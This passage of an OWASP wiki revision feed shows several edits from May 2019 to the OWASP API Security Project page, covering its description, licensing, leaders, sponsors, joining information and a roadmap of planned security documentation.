   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=Defenders]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[Image:Creative%20Commons.png| 90px | link=https://creativecommons.org/licenses/by-sa/3.0/| Creative Commons Attribution ShareAlike 3.0 License]]&lt;br /&gt;
   |}&lt;br /&gt;
|}&lt;br /&gt;
 &lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]] [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252030</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252030"/>
				<updated>2019-05-31T15:02:59Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added link to Kick-Off presentation&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What is API Security==&lt;br /&gt;
&lt;br /&gt;
[Coming Soon]&lt;br /&gt;
&lt;br /&gt;
== About this Project? ==&lt;br /&gt;
[Coming Soon]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security/tree/develop GitHub]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP APIs Security Project Kick Off.pdf]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:OWASP_APIs_Security_Project_Kick_Off.pdf&amp;diff=252029</id>
		<title>File:OWASP APIs Security Project Kick Off.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:OWASP_APIs_Security_Project_Kick_Off.pdf&amp;diff=252029"/>
				<updated>2019-05-31T15:00:38Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;OWASP APIs Security Project Kick-Off Presentation&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252028</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252028"/>
				<updated>2019-05-31T14:38:29Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Removed old material from Main page&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What is API Security==&lt;br /&gt;
&lt;br /&gt;
[Coming Soon]&lt;br /&gt;
&lt;br /&gt;
== About this Project? ==&lt;br /&gt;
[Coming Soon]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security/tree/develop GitHub]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252021</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252021"/>
				<updated>2019-05-31T14:09:42Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added a Join page&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security/tree/develop GitHub]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252020</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=252020"/>
				<updated>2019-05-31T13:48:32Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Changed the layout of the Main section&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP API Security Project==&lt;br /&gt;
&lt;br /&gt;
=== [24-Dec-2018] ===&lt;br /&gt;
'''The OWASP API Security Project is now under new leadership.'''&lt;br /&gt;
'''A new roadmap and call for contribution will be published by the end of Feb 2019.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This project is designed to address the ever-increasing number of organizations that are deploying potentially sensitive APIs as part of their software offerings. These APIs are used for internal tasks and to interface with third parties. Unfortunately, many APIs do not undergo the rigorous security testing that would render them secure from attack.&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project seeks to provide value to software developers and security assessors by underscoring the potential risks in insecure APIs and illustrating how these risks may be mitigated. In order to facilitate this goal, the OWASP API Security Project will create and maintain a '''Top 10 API Security Risks''' document, as well as a '''documentation portal''' for best practices when creating or assessing APIs.&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
While working as developers or information security consultants, many people have encountered APIs as part of a project. While there are some resources to help create and evaluate these projects (such as the OWASP REST Security Cheat Sheet), there has not be a comprehensive security project designed to assist builders, breakers, and defenders in the community.&lt;br /&gt;
&lt;br /&gt;
This project aims to create:&lt;br /&gt;
&lt;br /&gt;
* The OWASP Top Ten API Security Risks document, which can easily underscore the most common risks in the area.&lt;br /&gt;
* Create a documentation portal for developers to build APIs in a secure manner.&lt;br /&gt;
* Work with the security community to maintain living documents that evolve with security trends.&lt;br /&gt;
&lt;br /&gt;
== What is this project? ==&lt;br /&gt;
The OWASP API Security Project seeks to deliver actionable documentation on creating and deploying verifiably secure web APIs, as well as illustrating the major risks and shortfalls that APIs may encounter. By helping developers create resilient software, and helping assessors understand the subtle risks an API may entail, the goal of this project is to bring security to an increasingly programmatic world.&lt;br /&gt;
&lt;br /&gt;
The primary deliverables of this project are the '''OWASP Top Ten API Security Risks''' and a secure API development '''documentation portal.'''&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.owasp.org/index.php/User:ErezYalon Erez Yalon]&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security/tree/develop GitHub]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
